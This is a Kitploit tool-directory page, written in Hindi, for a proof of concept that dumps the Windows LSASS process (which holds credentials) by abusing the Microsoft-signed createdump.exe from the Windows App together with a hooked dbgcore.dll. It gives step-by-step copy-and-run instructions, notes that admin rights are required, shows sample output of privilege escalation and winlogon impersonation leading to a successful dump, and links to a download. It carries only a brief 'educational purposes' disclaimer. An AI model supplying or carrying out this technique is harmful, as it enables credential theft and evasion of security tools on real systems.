Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
createdump — WindowsApp के createdump टूल का उपयोग करके lsass डंप प्राप्त करें | Kitploit
उपकरण/GitHubGitHub/rweijnen/createdump
पासवर्ड हमलेपहचान छुपाने के उपकरणपोस्ट-शोषणरेड टीमिंग
GitHubrweijnen/createdump

createdump

WindowsApp के createdump टूल का उपयोग करके lsass डंप प्राप्त करें

रिपॉजिटरी देखें
1512081 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Windows App Windows App LSASS डंप - प्रूफ ऑफ कॉन्सेप्ट

यह प्रोजेक्ट दर्शाता है कि कैसे Windows App से createdump.exe टूल, जो एक Microsoft हस्ताक्षरित निष्पादन योग्य है, का उपयोग करके LSASS प्रक्रिया को डंप किया जाए, और LSASS तक प्रक्रिया पहुँच सक्षम करने के लिए एक कस्टम हुक का लाभ उठाया जाता है।

root@kitploit:~
Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')

    Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc

SignerCertificate                         Status                                       StatusMessage                               Path
-----------------                         ------                                       -------------                               ----
C2048FB509F1C37A8C3E9EC6648118458AA01780  Valid                                        Signature verified.                         createdump.exe

उपयोग कैसे करें

  1. createdump को WindowsApp फ़ोल्डर से अपनी पसंद के फ़ोल्डर में कॉपी करें (copy C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe .)
  2. इस रिपॉजिटरी से dbgcore.dll को उसी फ़ोल्डर में रखें
  3. createdump को निष्पादित करें (वैकल्पिक रूप से पैरामीटर प्रदान करें)

नोट: एडमिन अधिकार आवश्यक हैं।

आउटपुट कुछ इस प्रकार होना चाहिए:

root@kitploit:~
c:\work\_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump

Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
  ProcessId: 35828
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
  ProcessId: 1512
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इस टूल के दुरुपयोग से गोपनीयता और सुरक्षा नीतियों का उल्लंघन हो सकता है।

टूल डाउनलोड करें